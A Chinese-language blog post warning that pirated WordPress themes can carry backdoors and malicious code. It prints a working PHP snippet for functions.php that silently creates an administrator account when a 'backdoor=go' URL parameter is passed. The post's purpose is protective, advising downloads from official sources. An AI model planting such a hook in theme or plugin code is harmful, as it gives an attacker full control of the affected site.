注意啦!wordpress盗版主题中可能存在后门!

2016-12-30 0 374 百度已收录

WordPress除了大量官方的主题,还有为数众多的主题设计者发布免费和收费主题,很多童鞋经常到处收集主题拿回来测试使用,其中一些无良者将收集到 的国外商业收费主题进行汉化修改,添加暗链、广告,甚至恶意代码,然后免费或者收费公开发布出去,诱使别人下载使用,达到不可告人的目的。另外,这些商业 收费主题一般都是测试版本,主题代码不完善、功能缺失,个别测试版的商业主题启用后会自动向数据库中写入大量数据…….

注意啦!wordpress盗版主题中可能存在后门!

下面的代码更加邪恶,可以自动添加一个角色为管理员的用户。

  1. add_action(‘wp_head’, ‘holeinthewall’);    
  2. function holeinthewall() {    
  3.         If ($_GET[‘backdoor’] == ‘go’) {    
  4.                 require(‘wp-includes/registration.php’);    
  5.                 If (!username_exists(‘username’)) {    
  6.                         $user_id = wp_create_user(‘username’, ‘password’);    
  7.                         $user = new WP_User($user_id);    
  8.                         $user->set_role(‘administrator’);    
  9.                 }    
  10.         }    
  11. }  

将代码添加到您当前主题的 functions.php 文件或插件中,会自动创建一个用户名:username 密码:password的有管理员权限的用户,之后想做什么都可以了。

所以,这里奉劝大家还是不要在自己的站点上使用盗版主题和插件,尽量到官方或原始发布站点下载主题,以免被开了后门也不知晓!

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

所有文章为演示数据,不提供下载地址,版权归原作者所有,仅提供演示效果!

模板下载吧 WP技术 注意啦!wordpress盗版主题中可能存在后门! https://www.mbxzb.cn/blog/file/wordpress/1250.html

从明天起,做一个幸福的人,喂马、劈柴、周游世界…

常见问题
  • 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。
查看详情
  • 最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用
查看详情

相关文章

评论
暂无评论
注意啦!wordpress盗版主题中可能存在后门!-海报

分享本文封面